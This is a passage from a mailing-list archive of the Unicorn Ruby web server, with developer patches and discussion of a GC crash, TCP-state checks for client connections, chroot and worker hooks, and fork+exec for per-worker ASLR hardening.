$74 = (struct gc_list *) 0x7feb6424e2a0
$75 = 7 # T_ARRAY
---------------------------------------------
(gdb)
$76 = (struct gc_list *) 0x7feb63a8c120
$77 = 8


// abnormal
(gdb)
$72 = (struct gc_list *) 0x7f7547651cc0
$73 = 5
---------------------------------------------
(gdb)
$74 = (struct gc_list *) 0x7f7546939760
$75 = 27 # T_NODE
---------------------------------------------
(gdb)
$76 = (struct gc_list *) 0x7f7546583e70
$77 = 8

Note that I have checked the whole global_list, the order looks the same.
Hence, I am quite sure that the T_NODE in the abnormal one comes from the same
module as the T_ARRAY in the normal one.
And from contents in T_ARRAY, the module should be unicorn_http.

^ permalink raw reply	[relevance 4%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  2017-10-03 14:52  3% ` Xuanzhong Wei
@ 2017-10-03 17:15  0%   ` Eric Wong
  2017-10-03 18:20  4%     ` Xuanzhong Wei
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-10-03 17:15 UTC (permalink / raw)
  To: Xuanzhong Wei; +Cc: code, maillist, pere.joan, philip, unicorn-public

Xuanzhong Wei <azrlew@gmail.com> wrote:
> We have the same issue here.
> 
> IMHO, it is a bug introduced by 979ebcf91705709be5041a3be4514e5f1f6ec02c.
> The `mark_ary` get GCed before we add it to the ruby's global_list
> since we are doing memory allocations before calling rb_global_variable.
> 
> A simple test can be found here:
> https://github.com/azrle/ruby_c_ext_test

Thanks, which compiler and version did you use?

> I will try to submit a patch later.

https://bogomips.org/unicorn-public/20171003145718.30404-1-azrlew@gmail.com/raw

Yes, seems corect since the compiler doesn't need to keep
mark_ary anymore once it only needs the address (&mark_ary).
OBJ_FREEZE is an inline which does nothing to prevent
the compiler from only keeping RBasic->flags around and
not the actual VALUE.

^ permalink raw reply	[relevance 0%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  @ 2017-10-03 14:52  3% ` Xuanzhong Wei
  2017-10-03 17:15  0%   ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Xuanzhong Wei @ 2017-10-03 14:52 UTC (permalink / raw)
  To: e; +Cc: code, maillist, pere.joan, philip, unicorn-public, Xuanzhong Wei

We have the same issue here.

IMHO, it is a bug introduced by 979ebcf91705709be5041a3be4514e5f1f6ec02c.
The `mark_ary` get GCed before we add it to the ruby's global_list
since we are doing memory allocations before calling rb_global_variable.

A simple test can be found here:
https://github.com/azrle/ruby_c_ext_test

I will try to submit a patch later.

^ permalink raw reply	[relevance 3%]

* Re: after_worker_exit on murder
  @ 2017-04-04 14:32  3% ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-04-04 14:32 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public

On 04/04 10:08, Simon Eskildsen wrote:
> Hi!
> 
> With Jeremy Evans' work on `after_worker_exit`, I was hoping I could
> replace our internal fork which has a `before_murder` hook to report
> to monitoring systems when workers are forcibly killed. However, the
> `after_worker_exit` is only called on reaping???not when murdering.
> 
> How would you feel about executing this on the murder path?
> Alternatively, we could add an `after_murder` hook for this path.

I checked and after_worker_exit is called when reaping the worker
after murdering, so I don't think any changes are necessary. I would
guess if you added it when murdering, it would be called twice on the
same worker.

Thanks,
Jeremy

^ permalink raw reply	[relevance 3%]

* [PATCH] Check for SocketError on first ccc attempt
@ 2017-03-24 20:03  2% Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-03-24 20:03 UTC (permalink / raw)
  To: unicorn-public

On OpenBSD, getsockopt(2) does not support TCP_INFO.  With the current code,
this results in a 500 for all clients if check_client_connection is enabled
on OpenBSD.

This patch rescues SocketError on the first getsockopt call, and
if SocketError is raised, it doesn't check in the future.  This
should be the same behavior as if TCP_INFO was supported but
inspect did not return a string in the expected format.
---
 lib/unicorn/http_request.rb | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 7253497..6dc0aa7 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -29,7 +29,7 @@ class Unicorn::HttpParser
   EMPTY_ARRAY = [].freeze
   @@input_class = Unicorn::TeeInput
   @@check_client_connection = false
-  @@tcpi_inspect_ok = true
+  @@tcpi_inspect_ok = nil
 
   def self.input_class
     @@input_class
@@ -154,10 +154,20 @@ def closed_state?(state) # :nodoc:
     # Not that efficient, but probably still better than doing unnecessary
     # work after a client gives up.
     def check_client_connection(socket) # :nodoc:
-      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok
-        opt = socket.getsockopt(:IPPROTO_TCP, :TCP_INFO).inspect
-        if opt =~ /\bstate=(\S+)/
+      if Unicorn::TCPClient === socket && @@tcpi_inspect_ok != false
+        if @@tcpi_inspect_ok
+          opt = socket.getsockopt(:IPPROTO_TCP, :TCP_INFO).inspect
+        else
           @@tcpi_inspect_ok = true
+          opt = begin
+            socket.getsockopt(:IPPROTO_TCP, :TCP_INFO)
+          rescue SocketError
+            @@tcpi_inspect_ok = false
+            return write_http_header(socket)
+          end.inspect
+        end
+
+        if opt =~ /\bstate=(\S+)/
           raise Errno::EPIPE, "client closed connection".freeze,
                 EMPTY_ARRAY if closed_state_str?($1)
         else
-- 
2.11.0


^ permalink raw reply related	[relevance 2%]

* [PATCH (ccc)] http_request: support proposed Raindrops::TCP states on
       [not found]     <20170316031652.17433-1-e@80x24.org>
@ 2017-03-21  2:55  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-03-21  2:55 UTC (permalink / raw)
  To: Simon Eskildsen, unicorn-public; +Cc: raindrops-public, Jeremy Evans

TCP states names/numbers seem stable for each OS, but differ in
name and numeric values between them.  So I started upon this
patch series for raindrops last week:

  https://bogomips.org/raindrops-public/20170316031652.17433-1-e@80x24.org/T/

And things seem to be alright, for the most part.  Anyways
here's a proposed patch for unicorn which takes advantage of
the above (proposed) changes for raindrops and will allow
unicorn to support check_client_connection

Also Cc:-ing Jeremy to see if he has any input on the OpenBSD
side of things.

This goes on top of commit 20c66dbf1ebd0ca993e7a79c9d0d833d747df358
("http_request: reduce insn size for check_client_connection")
at: git://bogomips.org/unicorn ccc-tcp-v3

-------8<--------
Subject: [PATCH] http_request: support proposed Raindrops::TCP states on
 non-Linux

raindrops 0.18+ will have Raindrops::TCP state hash for portable
mapping of TCP states to their respective numeric values.  This
was necessary because TCP state numbers (and even macro names)
differ between FreeBSD and Linux (and possibly other OSes).

Favor using the Raindrops::TCP state hash if available, but
fall back to the hard-coded values since older versions of
raindrops did not support TCP_INFO on non-Linux systems.

While we're in the area, favor "const_defined?" over "defined?"
to reduce the inline constant cache footprint for branches
which are only evaluated once.

Patches to implement Raindrops::TCP for FreeBSD are available at:

  https://bogomips.org/raindrops-public/20170316031652.17433-1-e@80x24.org/T/
---
 lib/unicorn/http_request.rb | 38 +++++++++++++++++++++++++++++---------
 1 file changed, 29 insertions(+), 9 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 9010007..7253497 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -105,7 +105,7 @@ def hijacked?
     env.include?('rack.hijack_io'.freeze)
   end
 
-  if defined?(Raindrops::TCP_Info)
+  if Raindrops.const_defined?(:TCP_Info)
     TCPI = Raindrops::TCP_Info.allocate
 
     def check_client_connection(socket) # :nodoc:
@@ -118,14 +118,34 @@ def check_client_connection(socket) # :nodoc:
       end
     end
 
-    def closed_state?(state) # :nodoc:
-      case state
-      when 1 # ESTABLISHED
-        false
-      when 8, 6, 7, 9, 11 # CLOSE_WAIT, TIME_WAIT, CLOSE, LAST_ACK, CLOSING
-        true
-      else
-        false
+    if Raindrops.const_defined?(:TCP)
+      # raindrops 0.18.0+ supports FreeBSD + Linux using the same names
+      # Evaluate these hash lookups at load time so we can
+      # generate an opt_case_dispatch instruction
+      eval <<-EOS
+      def closed_state?(state) # :nodoc:
+        case state
+        when #{Raindrops::TCP[:ESTABLISHED]}
+          false
+        when #{Raindrops::TCP.values_at(
+              :CLOSE_WAIT, :TIME_WAIT, :CLOSE, :LAST_ACK, :CLOSING).join(',')}
+          true
+        else
+          false
+        end
+      end
+      EOS
+    else
+      # raindrops before 0.18 only supported TCP_INFO under Linux
+      def closed_state?(state) # :nodoc:
+        case state
+        when 1 # ESTABLISHED
+          false
+        when 8, 6, 7, 9, 11 # CLOSE_WAIT, TIME_WAIT, CLOSE, LAST_ACK, CLOSING
+          true
+        else
+          false
+        end
       end
     end
   else
-- 
EW

^ permalink raw reply related	[relevance 5%]

* Re: [PATCH] check_client_connection: use tcp state on linux
  @ 2017-03-13 20:16  3%                   ` Simon Eskildsen
  0 siblings, 0 replies; 200+ results
From: Simon Eskildsen @ 2017-03-13 20:16 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

I've put ccc-tcp-v3 in production today--it appears to be working as
expected, still rejecting at the exact same rate as before (100-200
per second for us during steady-state).

On Wed, Mar 8, 2017 at 7:06 AM, Simon Eskildsen
<simon.eskildsen@shopify.com> wrote:
> Patch-set looks great Eric, thanks!
>
> I'm hoping to test this in production later this week or next, but
> we're a year behind on Unicorn (ugh), so will need to carefully roll
> that out.
>
> On Tue, Mar 7, 2017 at 7:26 PM, Eric Wong <e@80x24.org> wrote:
>> Eric Wong <e@80x24.org> wrote:
>>> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>>> > @@ -28,6 +29,7 @@ class Unicorn::HttpParser
>>> >    # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
>>> >    # 2.2+ optimizes hash assignments when used with literal string keys
>>> >    HTTP_RESPONSE_START = [ 'HTTP', '/1.1 ']
>>> > +  EMPTY_ARRAY = [].freeze
>>>
>>> (minor) this was made before commit e06b699683738f22
>>> ("http_request: freeze constant strings passed IO#write")
>>> but I've trivially fixed it up, locally.
>>
>> And I actually screwed it up, pushed out ccc-tcp-v2 branch
>> with that fix squashed in :x
>>
>> Writing tests, now...

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Add worker_exec configuration option V2
  @ 2017-03-11  7:18  3%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-03-11  7:18 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> On 03/10 09:19, Eric Wong wrote:
> > tests, later, or you can.  I also had some FreeBSD test fixes
> > (which might apply to OpenBSD) on a VM somewhere which I'll Cc:
> > you on: there was also just SO_KEEPALIVE fix I posted:
> > 
> >   https://bogomips.org/unicorn-public/20170310203431.28067-1-e@80x24.org/raw
> 
> The C test code also returns 8 on OpenBSD, FWIW.  I'm happy to test any
> test fixes on OpenBSD, just let me know.

Thanks. I'll be happy to help fix any OpenBSD failures you see
from "gmake check"  I don't think the accept_filter fixes apply
to OpenBSD, but I guess the expr(1) fix did.

Thank you.

Same goes for NetBSD, DragonflyBSD or any other completely
Free/Open Source OSes anybody else here uses.

> > Jeremy Evans <code@jeremyevans.net> wrote:
> > > -      if pid = fork
> > > -        @workers[pid] = worker
> > > -        worker.atfork_parent
> > > +
> > > +      pid = if @worker_exec
> > > +        worker_spawn(worker)
> > >        else
> > > -        after_fork_internal
> > > -        worker_loop(worker)
> > > -        exit
> > > +        fork do
> > > +          after_fork_internal
> > > +          worker_loop(worker)
> > > +          exit
> > > +        end
> > 
> > I prefer to avoid the block with fork.  The block deepens the
> > stack for the running app, so it can affect GC efficiency.
> > 
> > Can be fixed in a separate patch...
> 
> That makes sense.  If you would like me to send a separate patch to fix
> it, I can do that.

Yes, please.

Not sure if we should automate the stack depth test...
I resisted it in the past since it might be too fragile
w.r.t changes to Ruby (even using "unicorn" via the
RubyGems-generated wrapper deepens it by 2).

Thanks again.

^ permalink raw reply	[relevance 3%]

* Re: Patch: Add after_worker_ready configuration option
  2017-02-23  9:23  2%     ` Eric Wong
@ 2017-02-23 20:00  0%       ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-02-23 20:00 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/23 09:23, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > On 02/23 02:32, Eric Wong wrote:
> > > Jeremy Evans <code@jeremyevans.net> wrote:
> > > Anyways, I'm somewhat inclined to accept this as well, but will
> > > think about it a bit, too.
> > > 
> > > One problem I have with this change is that it requires users
> > > read more documentation and know more caveats to use.
> >  
> > It's unfortunate, but I think it's necessary in this case. Unicorn's
> > default behavior works for most users, but this makes it so you
> > don't have to override HttpServer#init_worker_process to get similar
> > functionality.
> 
> Yeah.  Unfortunately, with every option comes more
> support/maintenance overhead.  So I'm trying to make sure we've
> explored every possible avenue before adding this new option.

I agree.  If I knew of a way to get this functionality without
overriding a private method, I would use it.  I'm not sure there is a
way currently, which I why I worked on the patch.

> > >     So I'm wondering if there can be some of that which could be
> > >     trimmed out someday or made optional, somehow.
> > 
> > I'm not sure how open you are to a plugin-like system for Unicorn, where
> > you can have separate files for separate features, and users can choose
> > which features the want to use.  This limits memory usage so that you
> > don't pay a memory cost for features you don't use.  This is the
> > approach used by Sequel, Roda, and Rodauth (other libraries I maintain),
> > and if you are interested in a similar system for Unicorn, I would be
> > happy to work on one.
> 
> Not really.  As I've stated many times in the past, unicorn is
> just one of many servers available for Rack users; so I've been
> against people building too many dependencies on unicorn, that
> comes at the expense of other servers.
 
True, but there are features that only unicorn provides.  If you want
those features, you have to use unicorn anyway. 

> What I had in mind was having a shim process which does socket
> setup, user switching, etc. before exec-ing unicorn in cases
> where a systemd-like spawner is not used.  But it's probably too
> small to make an impact on real apps anyways, since Ruby still
> has tons of methods which never get called, either.

I could see that decreasing memory usage slightly, but I agree it's
unlikely to make a significant impact.

> > I do have a couple of additional patches I plan to send, but I think it
> > may be better to ask here first.
> > 
> > One is that SIGUSR1 handling doesn't work well with chroot if the log
> > file is outside of the chroot, since the worker process may not have
> > access to reopen the file.  One simple fix is to reopen the logs in
> > the master process, then send SIGQUIT instead of SIGUSR1 to the child
> > processes.  Are you open to a patch that does that?
> 
> Right now, the worker exits with some log spew if reopening
> logs fails, and the worker respawns anyways, correct?
> 
> Perhaps that mapping can be made automatic if chroot is
> enabled.  I wonder if that's too much magic...
> Or the log spew could be suppressed when the error
> is ENOENT and chroot is enabled.
> 
> The sysadmin could also send SIGHUP to reload everything
> and respawn all children.
> 
> So, I'm wondering if using SIGHUP is too much of a burden, or if
> automatic USR1 => QUIT mapping for chroot users is too magical.

SIGHUP is actually fine.  I didn't realize it reopened log files
in the master process, but apparently it does, so I can just use
SIGHUP instead of SIGUSR1.

> > The second feature is more exotic security feature called fork+exec.
> > The current issue with unicorn's direct forking of children is that
> > forked children share the memory layout of the server.  This is good
> > from a memory usage standpoint due to CoW memory.  However, if there
> > is a memory vulnerability in the unicorn application, this makes it
> > easier to exploit, since if the a unicorn worker process crashes, the
> > master process will fork a child with pretty much the same memory
> > layout.  This allows address space discovery attacks.  Using fork+exec,
> > each child process would have a unique address space for ASLR, on
> > most Unix-like systems (Linux, MacOS X, NetBSD, OpenBSD, Solaris).
> > There are additional security advantages from fork+exec on OpenBSD, but
> > all Unix-like systems that use ASLR can benefit from the unique
> > memory layout per process.
> 
> It depends how intrusive the implementation is...

That I don't know yet.  I haven't implemented fork+exec before, so I'm
not sure how many changes are needed. I probably won't be able to work
on this right away.

> Is this merely calling exec in the worker?
> 
> I'm not sure if your use of "fork+exec" is merely the two
> well-known syscalls combined, or if there's something else;
> I'll assume the former, since that's enough to have a
> unique address space for Ruby bytecode.
> 
> Can this be done in an after_fork/after_worker_ready hook?
> 
> Socket inheritance can be done the same way it handles USR2
> upgrades and systemd socket inheritance.

I expect in addition to socket inheritance, we will need to handle pipe
inheritance for the @to_io and @master pipes in the worker.

Thanks,
Jeremy

^ permalink raw reply	[relevance 0%]

* Re: Patch: Add after_worker_ready configuration option
  2017-02-23  3:43  1%   ` Jeremy Evans
@ 2017-02-23  9:23  2%     ` Eric Wong
  2017-02-23 20:00  0%       ` Jeremy Evans
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-23  9:23 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:

<snip> acknowledging everything above.

> On 02/23 02:32, Eric Wong wrote:
> > Jeremy Evans <code@jeremyevans.net> wrote:
> > Anyways, I'm somewhat inclined to accept this as well, but will
> > think about it a bit, too.
> > 
> > One problem I have with this change is that it requires users
> > read more documentation and know more caveats to use.
>  
> It's unfortunate, but I think it's necessary in this case. Unicorn's
> default behavior works for most users, but this makes it so you
> don't have to override HttpServer#init_worker_process to get similar
> functionality.

Yeah.  Unfortunately, with every option comes more
support/maintenance overhead.  So I'm trying to make sure we've
explored every possible avenue before adding this new option.

<snip>

> > (*) Fwiw, I wasn't thrilled to add user switching to unicorn back
> >     in 2009/2010, as it should not need to run privileged ports.
> 
> I think had you not added it, there wouldn't be a need for a chroot
> patch, since otherwise one would assume any user that wanted to
> drop privileges would just run the necessary code themselves.
> 
> One thing to keep in mind is that if you did not add the user switching
> code, developers who need it would implement it themselves, and would
> likely miss things like initgroups.

Heh.  As I was mentioning above, every feature can come with
new, unintended consequences :>  But yeah, maybe push things
up to Ruby stdlib, or systemd...

> >     So I'm wondering if there can be some of that which could be
> >     trimmed out someday or made optional, somehow.
> 
> I'm not sure how open you are to a plugin-like system for Unicorn, where
> you can have separate files for separate features, and users can choose
> which features the want to use.  This limits memory usage so that you
> don't pay a memory cost for features you don't use.  This is the
> approach used by Sequel, Roda, and Rodauth (other libraries I maintain),
> and if you are interested in a similar system for Unicorn, I would be
> happy to work on one.

Not really.  As I've stated many times in the past, unicorn is
just one of many servers available for Rack users; so I've been
against people building too many dependencies on unicorn, that
comes at the expense of other servers.

What I had in mind was having a shim process which does socket
setup, user switching, etc. before exec-ing unicorn in cases
where a systemd-like spawner is not used.  But it's probably too
small to make an impact on real apps anyways, since Ruby still
has tons of methods which never get called, either.

> I do have a couple of additional patches I plan to send, but I think it
> may be better to ask here first.
> 
> One is that SIGUSR1 handling doesn't work well with chroot if the log
> file is outside of the chroot, since the worker process may not have
> access to reopen the file.  One simple fix is to reopen the logs in
> the master process, then send SIGQUIT instead of SIGUSR1 to the child
> processes.  Are you open to a patch that does that?

Right now, the worker exits with some log spew if reopening
logs fails, and the worker respawns anyways, correct?

Perhaps that mapping can be made automatic if chroot is
enabled.  I wonder if that's too much magic...
Or the log spew could be suppressed when the error
is ENOENT and chroot is enabled.

The sysadmin could also send SIGHUP to reload everything
and respawn all children.

So, I'm wondering if using SIGHUP is too much of a burden, or if
automatic USR1 => QUIT mapping for chroot users is too magical.

(trying to avoid adding more options + documentation, as always :)

> The second feature is more exotic security feature called fork+exec.
> The current issue with unicorn's direct forking of children is that
> forked children share the memory layout of the server.  This is good
> from a memory usage standpoint due to CoW memory.  However, if there
> is a memory vulnerability in the unicorn application, this makes it
> easier to exploit, since if the a unicorn worker process crashes, the
> master process will fork a child with pretty much the same memory
> layout.  This allows address space discovery attacks.  Using fork+exec,
> each child process would have a unique address space for ASLR, on
> most Unix-like systems (Linux, MacOS X, NetBSD, OpenBSD, Solaris).
> There are additional security advantages from fork+exec on OpenBSD, but
> all Unix-like systems that use ASLR can benefit from the unique
> memory layout per process.

It depends how intrusive the implementation is...

Is this merely calling exec in the worker?

I'm not sure if your use of "fork+exec" is merely the two
well-known syscalls combined, or if there's something else;
I'll assume the former, since that's enough to have a
unique address space for Ruby bytecode.

Can this be done in an after_fork/after_worker_ready hook?

Socket inheritance can be done the same way it handles USR2
upgrades and systemd socket inheritance.

^ permalink raw reply	[relevance 2%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  2:42  0%       ` Simon Eskildsen
@ 2017-02-23  3:52  2%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-02-23  3:52 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> > Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> >> I meant to ask, in Raindrops why do you use the netlink API to get the
> >> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> >> `tcpi_unacked`? (as described in
> >> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> >> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> >> looking to replace it with a middleware to simplify for Kubernetes.
> >> It's one of our main metrics for monitoring performance, especially
> >> around deploys.
> >
> > The netlink API allows independently-spawned processes to
> > monitor others; so it can be system-wide.  TCP_INFO requires the
> > process doing the checking to also have the socket open.
> >
> > I guess this reasoning for using netlink is invalid for containers,
> > though...
> 
> If you namespace the network it's problematic, yeah. I'm considering
> right now putting Raindrops in a middleware with the netlink API
> inside the container, but it feels weird. That said, if you consider
> the alternative of using `getsockopt(2)` on the listening socket, I
> don't know how you'd get access to the Unicorn listening socket from a
> middleware. Would it be nuts to expose a hook in Unicorn that allows
> periodic execution for monitoring listening stats from Raindrops on
> the listening socket? It seems somewhat of a narrow use-case, but on
> the other hand I'm also not a fan of doing
> `Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"}")`, but
> that might be less ugly.

Yeah, all options get pretty ugly since Rack doesn't expose that
in a standardized way.  Unicorn::HttpServer::LISTENERS is a
historical constant which stores all listeners used by some
parts of raindrops.

Maybe relying on ObjectSpace or walking the LISTEN_FDS env from
systemd is acceptable for other servers *shrug*


Another way might be to rely on tcpi_last_data_recv in struct
tcp_info from each and every client socket.  That should tell
you when a client stopped writing to the socket, which works for
most HTTP requests.  You could use the same getsockopt() call
you'd use for check_client_connection to read that field.

However, this won't be visible until the client is accept()ed.

raindrops actually has some support for this, but it was
ugly, too (hooking into *accept* methods):
https://bogomips.org/raindrops/Raindrops/LastDataRecv.html

Perhaps refinements could be used, nowadays (I've never used
them).  Just throwing options out there...


In any case, what I definitely do not want is to introduced more
specialized configuration or API which might lock people into
unicorn or having to burden people with versioning incompatibilies.

> > (*) So I've been wondering if adding a "unicorn-mode" to an
> >     existing C10K, slow-client-capable Ruby/Rack server +
> >     reverse proxy makes sense for containerized deploys.
> >     Maybe...
> 
> I'd love to hear more about this idea. What are you contemplating?

Maybe another time, and not on the unicorn list.  I don't feel
comfortable writing about unrelated/tangential projects on the
unicorn list, even if I'm the leader of both projects.  Anyways,
this other server is also in the rack README.md and I've been
announcing it on ruby-talk since 2013.

^ permalink raw reply	[relevance 2%]

* Re: Patch: Add after_worker_ready configuration option
  @ 2017-02-23  3:43  1%   ` Jeremy Evans
  2017-02-23  9:23  2%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jeremy Evans @ 2017-02-23  3:43 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/23 02:32, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > This adds a hook that is called after the application has
> > been loaded by the worker process, directly before it starts
> > accepting requests.  This hook is necessary if your application
> > needs to get gain access to resources during initialization,
> > and then drop privileges before serving requests.
> > 
> > This is especially useful in conjunction with chroot support
> > so the app can load all the normal ruby libraries it needs
> > to function, and then chroot before accepting requests.
> > 
> > If you are preloading the app, it's possible to drop privileges
> > or chroot in after_fork, but if you are not preloading the app,
> > there is not currently a properly place to handle this, hence
> > the reason for this feature.
> 
> This means using Unicorn::Worker#user directly,
> and not Unicorn::Configurator#user.  OK...

Correct.  We could add configuration support to specify when to call
Worker#user, but that seems like overkill.
 
> Also, were you planning to send a v2 for chroot support?
> I'm fine with either.

Sorry about that, I will send a v2 for chroot support tomorrow.

> 
> > --- a/lib/unicorn/configurator.rb
> > +++ b/lib/unicorn/configurator.rb
> 
> > @@ -162,7 +165,7 @@ def after_fork(*args, &block)
> >    # sets after_worker_exit hook to a given block.  This block will be called
> >    # by the master process after a worker exits:
> >    #
> > -  #  after_fork do |server,worker,status|
> > +  #  after_worker_exit do |server,worker,status|
> >    #    # status is a Process::Status instance for the exited worker process
> >    #    unless status.success?
> >    #      server.logger.error("worker process failure: #{status.inspect}")
> 
> This looks like an unrelated hunk which belongs in a separate
> patch.  I can squeeze in a separate fix for this (credited to
> you) or you can send a separate patch.
 
Correct, this was an unrelated bug in my last patch.  I'll separate this
hunk into a separate patch.

> > @@ -172,6 +175,18 @@ def after_worker_exit(*args, &block)
> >      set_hook(:after_worker_exit, block_given? ? block : args[0], 3)
> >    end
> >  
> > +  # sets after_worker_ready hook to a given block.  This block will be called
> > +  # by a worker process after it has been fully loaded, directly before it
> > +  # starts responding to requests:
> > +  #
> > +  #  after_worker_ready do |server,worker|
> > +  #    server.logger.info("worker #{worker.nr} ready, dropping privileges")
> > +  #    worker.user('username', 'groupname')
> > +  #  end
> 
> The documentation should probably say something along the lines
> of:
> 
>     Do not use Unicorn::Configurator#user if you rely on
>     changing users in the after_worker_ready hook.
> 
> And maybe corresponding documentation for Unicorn::Configurator#user,
> too.

OK, I'll update the documentation to be more complete.

> Anyways, I'm somewhat inclined to accept this as well, but will
> think about it a bit, too.
> 
> One problem I have with this change is that it requires users
> read more documentation and know more caveats to use.
 
It's unfortunate, but I think it's necessary in this case. Unicorn's
default behavior works for most users, but this makes it so you
don't have to override HttpServer#init_worker_process to get similar
functionality.

> Adding to that, Unicorn::Configurator#user has been favored
> (documentation-wise) over Unicorn::Worker#user in the past;
> so it's a bit of a reversal(*)

I think Configurator#user still makes sense for most users.  As the
documentation mentions, directly calling Worker#user should only
be done if Configurator#user is not sufficient.

> Based on the series of changes you're making, I'm sensing you're
> working on some complex system which might need more security
> than a typical app.

These patches are related to all applications using Unicorn that I run
on OpenBSD (about 20 separate applications).  They are designed to
to reduce the attack surface if an attacker is able to find a
remote code execution vulnerability in one of the applications.

In addition to chroot(2), after chrooting, these applications also
use pledge(2), which is an OpenBSD-specific system call filter
(similar in principle to seccomp(2) in Linux).

> I know you use OpenBSD, and I don't know much about the init
> system or how deployment works, there.
 
It's a very simple sh(1) based-init system, similar to traditional Unix.
Most OpenBSD system daemons will start as root, chroot to a specific
directory, drop privileges (possibly separate privileges in separate
daemon processes connected via IPC), and finally use pledge(2) to limit
what each process can actually use in terms of system calls.

> Nowadays, it seems more common things (binding sockets,
> switching users, chrooting, etc..) is handled by init systems
> (at least systemd); and having that functionality in unicorn
> would mean redundant bloat.

I believe only Linux uses a systemd-like approach, and while most
Linux systems use systemd these days, usage is not universal
(notable exceptions are Slackware, Void, and Gentoo).  But my
knowledge of other operating systems is not very broad.

> It would be useful to me and folks who won't use these features
> to understand how and why they're used.  That can help justify
> the (admittedly small) memory overhead which comes with it.

True.  I'm sorry the commit messages didn't provide a more thorough
explanation.  I will try to improve that in the future.

> (*) Fwiw, I wasn't thrilled to add user switching to unicorn back
>     in 2009/2010, as it should not need to run privileged ports.

I think had you not added it, there wouldn't be a need for a chroot
patch, since otherwise one would assume any user that wanted to
drop privileges would just run the necessary code themselves.

One thing to keep in mind is that if you did not add the user switching
code, developers who need it would implement it themselves, and would
likely miss things like initgroups.

>     So I'm wondering if there can be some of that which could be
>     trimmed out someday or made optional, somehow.

I'm not sure how open you are to a plugin-like system for Unicorn, where
you can have separate files for separate features, and users can choose
which features the want to use.  This limits memory usage so that you
don't pay a memory cost for features you don't use.  This is the
approach used by Sequel, Roda, and Rodauth (other libraries I maintain),
and if you are interested in a similar system for Unicorn, I would be
happy to work on one.

I do have a couple of additional patches I plan to send, but I think it
may be better to ask here first.

One is that SIGUSR1 handling doesn't work well with chroot if the log
file is outside of the chroot, since the worker process may not have
access to reopen the file.  One simple fix is to reopen the logs in
the master process, then send SIGQUIT instead of SIGUSR1 to the child
processes.  Are you open to a patch that does that?

The second feature is more exotic security feature called fork+exec.
The current issue with unicorn's direct forking of children is that
forked children share the memory layout of the server.  This is good
from a memory usage standpoint due to CoW memory.  However, if there
is a memory vulnerability in the unicorn application, this makes it
easier to exploit, since if the a unicorn worker process crashes, the
master process will fork a child with pretty much the same memory
layout.  This allows address space discovery attacks.  Using fork+exec,
each child process would have a unique address space for ASLR, on
most Unix-like systems (Linux, MacOS X, NetBSD, OpenBSD, Solaris).
There are additional security advantages from fork+exec on OpenBSD, but
all Unix-like systems that use ASLR can benefit from the unique
memory layout per process.

Thanks,
Jeremy

^ permalink raw reply	[relevance 1%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  1:42  2%     ` Eric Wong
@ 2017-02-23  2:42  0%       ` Simon Eskildsen
  2017-02-23  3:52  2%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-23  2:42 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> Thanks for the writeup!
>
> Another sidenote: It seems nginx <-> unicorn is a bit odd
> for deployment in a containerized environment(*).
>
>> I meant to ask, in Raindrops why do you use the netlink API to get the
>> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
>> `tcpi_unacked`? (as described in
>> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
>> monitor socket backlogs with a sidekick Ruby daemon. Although we're
>> looking to replace it with a middleware to simplify for Kubernetes.
>> It's one of our main metrics for monitoring performance, especially
>> around deploys.
>
> The netlink API allows independently-spawned processes to
> monitor others; so it can be system-wide.  TCP_INFO requires the
> process doing the checking to also have the socket open.
>
